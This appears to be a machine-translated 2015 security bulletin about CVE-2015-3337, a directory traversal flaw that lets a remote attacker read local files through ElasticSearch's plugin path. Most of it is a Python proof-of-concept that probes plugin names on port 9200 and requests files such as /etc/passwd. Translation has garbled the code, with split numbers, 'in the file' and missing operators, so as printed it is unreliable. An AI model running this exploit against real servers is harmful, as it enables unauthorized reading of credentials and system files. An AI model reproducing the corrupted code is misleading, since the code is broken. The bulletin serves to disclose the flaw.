ElasticSearch exposure local arbitrary file read vulnerability, impact 1. 4. 5 and 1. 5. Before 2 all versions-bug warning-the black bar safety net

2015-05-23T00:00:00
ID MYHACK58:62201562759
Type myhack58
Reporter 佚名
Modified 2015-05-23T00:00:00

Description

! Recently in exploit-db on the aerator out of the ElasticSearch plug-in functionality directory traversal Path Transversal cause local arbitrary file read vulnerability, impact 1. 4. 5 and 1. 5. Before 2 All version. In zoomeye on casually looking for a few tried, found vulnerabilities in the area of impact is also quite large. Exploit(POC) !

!/ usr/bin/python

Crappy PoC for CVE-2 0 1 5-3 3 3 7 - Reported by John Heasman of DocuSign

Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5

Pedro Andujar || twitter: pandujar || email: @segfault. es || @digitalsec.net

Tested on default Linux (. deb) install /usr/share/elasticsearch/plugins/

Source: https://github.com/pandujar/elasticpwn/

import socket, sys

print "! dSR ElasticPwn - for CVE-2 0 1 5-3 3 3 7\n" if len(sys. argv) 3: print "Ex: %s www.example.com the /etc/passwd" % sys. argv[0] sys. exit()

port = 9 2 0 0 # Default ES http port host = sys. argv[1] fpath = sys. argv[2]

def grab(plugin): socket. setdefaulttimeout(3) s = socket. socket() s. connect((host,port)) s. send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n" "Host: %s\n\n" % (plugin, fpath, host)) file = s. recv(2 0 4 8) print " [*] Trying to retrieve %s:" % fpath if ("HTTP/1.0 2 0 0 OK" in the file): print "\n%s" % file else: print "[-] the File Not Found, No Access Rights or System Not Vulnerable"

def pfind(plugin): try: socket. setdefaulttimeout(3) s = socket. socket() s. connect((host,port)) s. send("GET /_plugin/%s/ HTTP/1.0\n" "Host: %s\n\n" % (plugin, host)) file = s. recv(1 of 6) print "[*] Trying to find plugin %s:" % plugin if ("HTTP/1.0 2 0 0 OK" in the file): print "[+] Plugin found!" grab(plugin) sys. exit() else: print "[-] Not Found" except Exception, e: print "[-] Error connecting to %s: %s" % (host, e) sys. exit()

Include more plugin names to check if they are installed

pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']

for plugin in pluginList: pfind(plugin)